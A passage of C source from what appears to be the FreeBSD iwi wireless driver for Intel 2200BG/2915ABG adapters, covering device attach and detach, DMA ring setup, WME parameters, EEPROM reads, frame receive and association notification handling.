ic->ic_scan_start = iwi_scan_start; ic->ic_scan_end = iwi_scan_end; ic->ic_set_channel = iwi_set_channel; ic->ic_scan_curchan = iwi_scan_curchan; ic->ic_scan_mindwell = iwi_scan_mindwell; ic->ic_wme.wme_update = iwi_wme_update; ic->ic_vap_create = iwi_vap_create; ic->ic_vap_delete = iwi_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), IWI_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), IWI_RX_RADIOTAP_PRESENT); iwi_sysctlattach(sc); iwi_ledattach(sc); /* * Hook our interrupt after all initialization is complete. */ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, iwi_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "could not set up interrupt\n"); goto fail; } if (bootverbose) ieee80211_announce(ic); return 0; fail: /* XXX fix */ iwi_detach(dev); return ENXIO; } static int iwi_detach(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; bus_teardown_intr(dev, sc->irq, sc->sc_ih); /* NB: do early to drain any pending tasks */ ieee80211_draintask(ic, &sc->sc_radiontask); ieee80211_draintask(ic, &sc->sc_radiofftask); ieee80211_draintask(ic, &sc->sc_restarttask); ieee80211_draintask(ic, &sc->sc_disassoctask); ieee80211_draintask(ic, &sc->sc_monitortask); iwi_stop(sc); ieee80211_ifdetach(ic); iwi_put_firmware(sc); iwi_release_fw_dma(sc); iwi_free_cmd_ring(sc, &sc->cmdq); iwi_free_tx_ring(sc, &sc->txq[0]); iwi_free_tx_ring(sc, &sc->txq[1]); iwi_free_tx_ring(sc, &sc->txq[2]); iwi_free_tx_ring(sc, &sc->txq[3]); iwi_free_rx_ring(sc, &sc->rxq); bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); delete_unrhdr(sc->sc_unr); IWI_LOCK_DESTROY(sc); if_free(ifp); return 0; } static struct ieee80211vap * iwi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; struct iwi_vap *ivp; struct ieee80211vap *vap; int i; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; /* * Get firmware image (and possibly dma memory) on mode change. */ if (iwi_get_firmware(sc, opmode)) return NULL; /* allocate DMA memory for mapping firmware image */ i = sc->fw_fw.size; if (sc->fw_boot.size > i) i = sc->fw_boot.size; /* XXX do we dma the ucode as well ? */ if (sc->fw_uc.size > i) i = sc->fw_uc.size; if (iwi_init_fw_dma(sc, i)) return NULL; ivp = (struct iwi_vap *) malloc(sizeof(struct iwi_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (ivp == NULL) return NULL; vap = &ivp->iwi_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override the default, the setting comes from the linux driver */ vap->iv_bmissthreshold = 24; /* override with driver methods */ ivp->iwi_newstate = vap->iv_newstate; vap->iv_newstate = iwi_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, iwi_media_status); ic->ic_opmode = opmode; return vap; } static void iwi_vap_delete(struct ieee80211vap *vap) { struct iwi_vap *ivp = IWI_VAP(vap); ieee80211_vap_detach(vap); free(ivp, M_80211_VAP); } static void iwi_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int iwi_alloc_cmd_ring(struct iwi_softc *sc, struct iwi_cmd_ring *ring, int count) { int error; ring->count = count; ring->queued = 0; ring->cur = ring->next = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * IWI_CMD_DESC_SIZE, 1, count * IWI_CMD_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * IWI_CMD_DESC_SIZE, iwi_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } return 0; fail: iwi_free_cmd_ring(sc, ring); return error; } static void iwi_reset_cmd_ring(struct iwi_softc *sc, struct iwi_cmd_ring *ring) { ring->queued = 0; ring->cur = ring->next = 0; } static void iwi_free_cmd_ring(struct iwi_softc *sc, struct iwi_cmd_ring *ring) { if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); } static int iwi_alloc_tx_ring(struct iwi_softc *sc, struct iwi_tx_ring *ring, int count, bus_addr_t csr_ridx, bus_addr_t csr_widx) { int i, error; ring->count = count; ring->queued = 0; ring->cur = ring->next = 0; ring->csr_ridx = csr_ridx; ring->csr_widx = csr_widx; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * IWI_TX_DESC_SIZE, 1, count * IWI_TX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * IWI_TX_DESC_SIZE, iwi_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct iwi_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, IWI_MAX_NSEG, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { error = bus_dmamap_create(ring->data_dmat, 0, &ring->data[i].map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } } return 0; fail: iwi_free_tx_ring(sc, ring); return error; } static void iwi_reset_tx_ring(struct iwi_softc *sc, struct iwi_tx_ring *ring) { struct iwi_tx_data *data; int i; for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } ring->queued = 0; ring->cur = ring->next = 0; } static void iwi_free_tx_ring(struct iwi_softc *sc, struct iwi_tx_ring *ring) { struct iwi_tx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int iwi_alloc_rx_ring(struct iwi_softc *sc, struct iwi_rx_ring *ring, int count) { struct iwi_rx_data *data; int i, error; ring->count = count; ring->cur = 0; ring->data = malloc(count * sizeof (struct iwi_rx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { data = &ring->data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, iwi_dma_map_addr, &data->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } data->reg = IWI_CSR_RX_BASE + i * 4; } return 0; fail: iwi_free_rx_ring(sc, ring); return error; } static void iwi_reset_rx_ring(struct iwi_softc *sc, struct iwi_rx_ring *ring) { ring->cur = 0; } static void iwi_free_rx_ring(struct iwi_softc *sc, struct iwi_rx_ring *ring) { struct iwi_rx_data *data; int i; if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int iwi_shutdown(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); iwi_stop(sc); iwi_put_firmware(sc); /* ??? XXX */ return 0; } static int iwi_suspend(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; ieee80211_suspend_all(ic); return 0; } static int iwi_resume(device_t dev) { struct iwi_softc *sc = device_get_softc(dev); struct ieee80211com *ic = sc->sc_ifp->if_l2com; pci_write_config(dev, 0x41, 0, 1); ieee80211_resume_all(ic); return 0; } static struct ieee80211_node * iwi_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { struct iwi_node *in; in = malloc(sizeof (struct iwi_node), M_80211_NODE, M_NOWAIT | M_ZERO); if (in == NULL) return NULL; /* XXX assign sta table entry for adhoc */ in->in_station = -1; return &in->in_node; } static void iwi_node_free(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct iwi_softc *sc = ic->ic_ifp->if_softc; struct iwi_node *in = (struct iwi_node *)ni; if (in->in_station != -1) { DPRINTF(("%s mac %6D station %u\n", __func__, ni->ni_macaddr, ":", in->in_station)); free_unr(sc->sc_unr, in->in_station); } sc->sc_node_free(ni); } /* * Convert h/w rate code to IEEE rate code. */ static int iwi_cvtrate(int iwirate) { switch (iwirate) { case IWI_RATE_DS1: return 2; case IWI_RATE_DS2: return 4; case IWI_RATE_DS5: return 11; case IWI_RATE_DS11: return 22; case IWI_RATE_OFDM6: return 12; case IWI_RATE_OFDM9: return 18; case IWI_RATE_OFDM12: return 24; case IWI_RATE_OFDM18: return 36; case IWI_RATE_OFDM24: return 48; case IWI_RATE_OFDM36: return 72; case IWI_RATE_OFDM48: return 96; case IWI_RATE_OFDM54: return 108; } return 0; } /* * The firmware automatically adapts the transmit speed. We report its current * value here. */ static void iwi_media_status(struct ifnet *ifp, struct ifmediareq *imr) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct iwi_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; /* read current transmission rate from adapter */ ni = ieee80211_ref_node(vap->iv_bss); ni->ni_txrate = iwi_cvtrate(CSR_READ_4(sc, IWI_CSR_CURRENT_TX_RATE)); ieee80211_free_node(ni); ieee80211_media_status(ifp, imr); } static int iwi_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct iwi_vap *ivp = IWI_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; DPRINTF(("%s: %s -> %s flags 0x%x\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate], sc->flags)); IEEE80211_UNLOCK(ic); IWI_LOCK(sc); switch (nstate) { case IEEE80211_S_INIT: /* * NB: don't try to do this if iwi_stop_master has * shutdown the firmware and disabled interrupts. */ if (vap->iv_state == IEEE80211_S_RUN && (sc->flags & IWI_FLAG_FW_INITED)) iwi_disassociate(sc, 0); break; case IEEE80211_S_AUTH: iwi_auth_and_assoc(sc, vap); break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_IBSS && vap->iv_state == IEEE80211_S_SCAN) { /* * XXX when joining an ibss network we are called * with a SCAN -> RUN transition on scan complete. * Use that to call iwi_auth_and_assoc. On completing * the join we are then called again with an * AUTH -> RUN transition and we want to do nothing. * This is all totally bogus and needs to be redone. */ iwi_auth_and_assoc(sc, vap); } else if (vap->iv_opmode == IEEE80211_M_MONITOR) ieee80211_runtask(ic, &sc->sc_monitortask); break; case IEEE80211_S_ASSOC: /* * If we are transitioning from AUTH then just wait * for the ASSOC status to come back from the firmware. * Otherwise we need to issue the association request. */ if (vap->iv_state == IEEE80211_S_AUTH) break; iwi_auth_and_assoc(sc, vap); break; default: break; } IWI_UNLOCK(sc); IEEE80211_LOCK(ic); return ivp->iwi_newstate(vap, nstate, arg); } /* * WME parameters coming from IEEE 802.11e specification. These values are * already declared in ieee80211_proto.c, but they are static so they can't * be reused here. */ static const struct wmeParams iwi_wme_cck_params[WME_NUM_AC] = { { 0, 3, 5, 7, 0 }, /* WME_AC_BE */ { 0, 3, 5, 10, 0 }, /* WME_AC_BK */ { 0, 2, 4, 5, 188 }, /* WME_AC_VI */ { 0, 2, 3, 4, 102 } /* WME_AC_VO */ }; static const struct wmeParams iwi_wme_ofdm_params[WME_NUM_AC] = { { 0, 3, 4, 6, 0 }, /* WME_AC_BE */ { 0, 3, 4, 10, 0 }, /* WME_AC_BK */ { 0, 2, 3, 4, 94 }, /* WME_AC_VI */ { 0, 2, 2, 3, 47 } /* WME_AC_VO */ }; #define IWI_EXP2(v) htole16((1 << (v)) - 1) #define IWI_USEC(v) htole16(IEEE80211_TXOP_TO_US(v)) static void iwi_wme_init(struct iwi_softc *sc) { const struct wmeParams *wmep; int ac; memset(sc->wme, 0, sizeof sc->wme); for (ac = 0; ac < WME_NUM_AC; ac++) { /* set WME values for CCK modulation */ wmep = &iwi_wme_cck_params[ac]; sc->wme[1].aifsn[ac] = wmep->wmep_aifsn; sc->wme[1].cwmin[ac] = IWI_EXP2(wmep->wmep_logcwmin); sc->wme[1].cwmax[ac] = IWI_EXP2(wmep->wmep_logcwmax); sc->wme[1].burst[ac] = IWI_USEC(wmep->wmep_txopLimit); sc->wme[1].acm[ac] = wmep->wmep_acm; /* set WME values for OFDM modulation */ wmep = &iwi_wme_ofdm_params[ac]; sc->wme[2].aifsn[ac] = wmep->wmep_aifsn; sc->wme[2].cwmin[ac] = IWI_EXP2(wmep->wmep_logcwmin); sc->wme[2].cwmax[ac] = IWI_EXP2(wmep->wmep_logcwmax); sc->wme[2].burst[ac] = IWI_USEC(wmep->wmep_txopLimit); sc->wme[2].acm[ac] = wmep->wmep_acm; } } static int iwi_wme_setparams(struct iwi_softc *sc, struct ieee80211com *ic) { const struct wmeParams *wmep; int ac; for (ac = 0; ac < WME_NUM_AC; ac++) { /* set WME values for current operating mode */ wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[ac]; sc->wme[0].aifsn[ac] = wmep->wmep_aifsn; sc->wme[0].cwmin[ac] = IWI_EXP2(wmep->wmep_logcwmin); sc->wme[0].cwmax[ac] = IWI_EXP2(wmep->wmep_logcwmax); sc->wme[0].burst[ac] = IWI_USEC(wmep->wmep_txopLimit); sc->wme[0].acm[ac] = wmep->wmep_acm; } DPRINTF(("Setting WME parameters\n")); return iwi_cmd(sc, IWI_CMD_SET_WME_PARAMS, sc->wme, sizeof sc->wme); } #undef IWI_USEC #undef IWI_EXP2 static void iwi_update_wme(void *arg, int npending) { struct ieee80211com *ic = arg; struct iwi_softc *sc = ic->ic_ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); (void) iwi_wme_setparams(sc, ic); IWI_UNLOCK(sc); } static int iwi_wme_update(struct ieee80211com *ic) { struct iwi_softc *sc = ic->ic_ifp->if_softc; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); /* * We may be called to update the WME parameters in * the adapter at various places. If we're already * associated then initiate the request immediately; * otherwise we assume the params will get sent down * to the adapter as part of the work iwi_auth_and_assoc * does. */ if (vap->iv_state == IEEE80211_S_RUN) ieee80211_runtask(ic, &sc->sc_wmetask); return (0); } static int iwi_wme_setie(struct iwi_softc *sc) { struct ieee80211_wme_info wme; memset(&wme, 0, sizeof wme); wme.wme_id = IEEE80211_ELEMID_VENDOR; wme.wme_len = sizeof (struct ieee80211_wme_info) - 2; wme.wme_oui[0] = 0x00; wme.wme_oui[1] = 0x50; wme.wme_oui[2] = 0xf2; wme.wme_type = WME_OUI_TYPE; wme.wme_subtype = WME_INFO_OUI_SUBTYPE; wme.wme_version = WME_VERSION; wme.wme_info = 0; DPRINTF(("Setting WME IE (len=%u)\n", wme.wme_len)); return iwi_cmd(sc, IWI_CMD_SET_WMEIE, &wme, sizeof wme); } /* * Read 16 bits at address 'addr' from the serial EEPROM. */ static uint16_t iwi_read_prom_word(struct iwi_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ IWI_EEPROM_CTL(sc, 0); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_C); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); /* write start bit (1) */ IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D | IWI_EEPROM_C); /* write READ opcode (10) */ IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_D | IWI_EEPROM_C); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_C); /* write address A7-A0 */ for (n = 7; n >= 0; n--) { IWI_EEPROM_CTL(sc, IWI_EEPROM_S | (((addr >> n) & 1) << IWI_EEPROM_SHIFT_D)); IWI_EEPROM_CTL(sc, IWI_EEPROM_S | (((addr >> n) & 1) << IWI_EEPROM_SHIFT_D) | IWI_EEPROM_C); } IWI_EEPROM_CTL(sc, IWI_EEPROM_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { IWI_EEPROM_CTL(sc, IWI_EEPROM_S | IWI_EEPROM_C); IWI_EEPROM_CTL(sc, IWI_EEPROM_S); tmp = MEM_READ_4(sc, IWI_MEM_EEPROM_CTL); val |= ((tmp & IWI_EEPROM_Q) >> IWI_EEPROM_SHIFT_Q) << n; } IWI_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ IWI_EEPROM_CTL(sc, IWI_EEPROM_S); IWI_EEPROM_CTL(sc, 0); IWI_EEPROM_CTL(sc, IWI_EEPROM_C); return val; } static void iwi_setcurchan(struct iwi_softc *sc, int chan) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; sc->curchan = chan; ieee80211_radiotap_chan_change(ic); } static void iwi_frame_intr(struct iwi_softc *sc, struct iwi_rx_data *data, int i, struct iwi_frame *frame) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mbuf *mnew, *m; struct ieee80211_node *ni; int type, error, framelen; int8_t rssi, nf; IWI_LOCK_DECL; framelen = le16toh(frame->len); if (framelen < IEEE80211_MIN_LEN || framelen > MCLBYTES) { /* * XXX >MCLBYTES is bogus as it means the h/w dma'd * out of bounds; need to figure out how to limit * frame size in the firmware */ /* XXX stat */ DPRINTFN(1, ("drop rx frame len=%u chan=%u rssi=%u rssi_dbm=%u\n", le16toh(frame->len), frame->chan, frame->rssi, frame->rssi_dbm)); return; } DPRINTFN(5, ("received frame len=%u chan=%u rssi=%u rssi_dbm=%u\n", le16toh(frame->len), frame->chan, frame->rssi, frame->rssi_dbm)); if (frame->chan != sc->curchan) iwi_setcurchan(sc, frame->chan); /* * Try to allocate a new mbuf for this ring element and load it before * processing the current mbuf. If the ring element cannot be loaded, * drop the received packet and reuse the old mbuf. In the unlikely * case that the old mbuf can't be reloaded either, explicitly panic. */ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; return; } bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(mnew, void *), MCLBYTES, iwi_dma_map_addr, &data->physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, iwi_dma_map_addr, &data->physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; return; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = mnew; CSR_WRITE_4(sc, data->reg, data->physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = sizeof (struct iwi_hdr) + sizeof (struct iwi_frame) + framelen; m_adj(m, sizeof (struct iwi_hdr) + sizeof (struct iwi_frame)); rssi = frame->rssi_dbm; nf = -95; if (ieee80211_radiotap_active(ic)) { struct iwi_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_antsignal = rssi; tap->wr_antnoise = nf; tap->wr_rate = iwi_cvtrate(frame->rate); tap->wr_antenna = frame->antenna; } IWI_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { type = ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else type = ieee80211_input_all(ic, m, rssi, nf); IWI_LOCK(sc); if (sc->sc_softled) { /* * Blink for any data frame. Otherwise do a * heartbeat-style blink when idle. The latter * is mainly for station mode where we depend on * periodic beacon frames to trigger the poll event. */ if (type == IEEE80211_FC0_TYPE_DATA) { sc->sc_rxrate = frame->rate; iwi_led_event(sc, IWI_LED_RX); } else if (ticks - sc->sc_ledevent >= sc->sc_ledidle) iwi_led_event(sc, IWI_LED_POLL); } } /* * Check for an association response frame to see if QoS * has been negotiated. We parse just enough to figure * out if we're supposed to use QoS. The proper solution * is to pass the frame up so ieee80211_input can do the * work but that's made hard by how things currently are * done in the driver. */ static void iwi_checkforqos(struct ieee80211vap *vap, const struct ieee80211_frame *wh, int len) { #define SUBTYPE(wh) ((wh)->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) const uint8_t *frm, *efrm, *wme; struct ieee80211_node *ni; uint16_t capinfo, status, associd; /* NB: +8 for capinfo, status, associd, and first ie */ if (!(sizeof(*wh)+8 < len && len < IEEE80211_MAX_LEN) || SUBTYPE(wh) != IEEE80211_FC0_SUBTYPE_ASSOC_RESP) return; /* * asresp frame format * [2] capability information * [2] status * [2] association ID * [tlv] supported rates * [tlv] extended supported rates * [tlv] WME */ frm = (const uint8_t *)&wh[1]; efrm = ((const uint8_t *) wh) + len; capinfo = le16toh(*(const uint16_t *)frm); frm += 2; status = le16toh(*(const uint16_t *)frm); frm += 2; associd = le16toh(*(const uint16_t *)frm); frm += 2; wme = NULL; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_VENDOR: if (iswmeoui(frm)) wme = frm; break; } frm += frm[1] + 2; } ni = ieee80211_ref_node(vap->iv_bss); ni->ni_capinfo = capinfo; ni->ni_associd = associd & 0x3fff; if (wme != NULL) ni->ni_flags |= IEEE80211_NODE_QOS; else ni->ni_flags &= ~IEEE80211_NODE_QOS; ieee80211_free_node(ni); #undef SUBTYPE } /* * Task queue callbacks for iwi_notification_intr used to avoid LOR's. */ static void iwi_notification_intr(struct iwi_softc *sc, struct iwi_notif *notif) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct iwi_notif_scan_channel *chan; struct iwi_notif_scan_complete *scan; struct iwi_notif_authentication *auth; struct iwi_notif_association *assoc; struct iwi_notif_beacon_state *beacon; switch (notif->type) { case IWI_NOTIF_TYPE_SCAN_CHANNEL: chan = (struct iwi_notif_scan_channel *)(notif + 1); DPRINTFN(3, ("Scan of channel %u complete (%u)\n", ieee80211_ieee2mhz(chan->nchan, 0), chan->nchan)); /* Reset the timer, the scan is still going */ sc->sc_state_timer = 3; break; case IWI_NOTIF_TYPE_SCAN_COMPLETE: scan = (struct iwi_notif_scan_complete *)(notif + 1); DPRINTFN(2, ("Scan completed (%u, %u)\n", scan->nchan, scan->status)); IWI_STATE_END(sc, IWI_FW_SCANNING); /* * Monitor mode works by doing a passive scan to set * the channel and enable rx. Because we don't want * to abort a scan lest the firmware crash we scan * for a short period of time and automatically restart * the scan when notified the sweep has completed. */ if (vap->iv_opmode == IEEE80211_M_MONITOR) { ieee80211_runtask(ic, &sc->sc_monitortask); break; } if (scan->status == IWI_SCAN_COMPLETED) { /* NB: don't need to defer, net80211 does it for us */ ieee80211_scan_next(vap); } break; case IWI_NOTIF_TYPE_AUTHENTICATION: auth = (struct iwi_notif_authentication *)(notif + 1); switch (auth->state) { case IWI_AUTH_SUCCESS: DPRINTFN(2, ("Authentication succeeeded\n")); ieee80211_new_state(vap, IEEE80211_S_ASSOC, -1); break; case IWI_AUTH_FAIL: /* * These are delivered as an unsolicited deauth * (e.g. due to inactivity) or in response to an * associate request. */ sc->flags &= ~IWI_FLAG_ASSOCIATED; if (vap->iv_state != IEEE80211_S_RUN) { DPRINTFN(2, ("Authentication failed\n")); vap->iv_stats.is_rx_auth_fail++; IWI_STATE_END(sc, IWI_FW_ASSOCIATING); } else { DPRINTFN(2, ("Deauthenticated\n")); vap->iv_stats.is_rx_deauth++; } ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); break; case IWI_AUTH_SENT_1: case IWI_AUTH_RECV_2: case IWI_AUTH_SEQ1_PASS: break; case IWI_AUTH_SEQ1_FAIL: DPRINTFN(2, ("Initial authentication handshake failed; " "you probably need shared key\n")); vap->iv_stats.is_rx_auth_fail++; IWI_STATE_END(sc, IWI_FW_ASSOCIATING); /* XXX retry shared key when in auto */ break; default: device_printf(sc->sc_dev, "unknown authentication state %u\n", auth->state); break; } break; case IWI_NOTIF_TYPE_ASSOCIATION: assoc = (struct iwi_notif_association *)(notif + 1); switch (assoc->state) { case IWI_AUTH_SUCCESS: /* re-association, do nothing */ break; case IWI_ASSOC_SUCCESS: DPRINTFN(2, ("Association succeeded\n")); sc->flags |= IWI_FLAG_ASSOCIATED; IWI_STATE_END(sc, IWI_FW_ASSOCIATING); iwi_checkforqos(vap, (const struct ieee80211_frame *)(assoc+1), le16toh(notif->len) - sizeof(*assoc) - 1); ieee80211_new_state(vap, IEEE80211_S_RUN, -1); break; case IWI_ASSOC_INIT: sc->flags &= ~IWI_FLAG_ASSOCIATED; switch (sc->fw_state) { case IWI_FW_ASSOCIATING: DPRINTFN(2, ("Association failed\n")); IWI_STATE_END(sc, IWI_FW_ASSOCIATING); ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); break; case IWI_FW_DISASSOCIATING: DPRINTFN(2, ("Dissassociated\n")); IWI_STATE_END(sc, IWI_FW_DISASSOCIATING); vap->iv_stats.is_rx_disassoc++; ieee80211_new_state(vap, IEEE80211_S_SCAN, -1); break; } break; default: device_printf(sc->sc_dev, "unknown association state %u\n", assoc->state); break; } break; case IWI_NOTIF_TYPE_BEACON: /* XXX check struct length */ beacon = (struct iwi_notif_beacon_state *)(notif + 1); DPRINTFN(5, ("Beacon state (%u, %u)\n", beacon->state, le32toh(beacon->number))); if 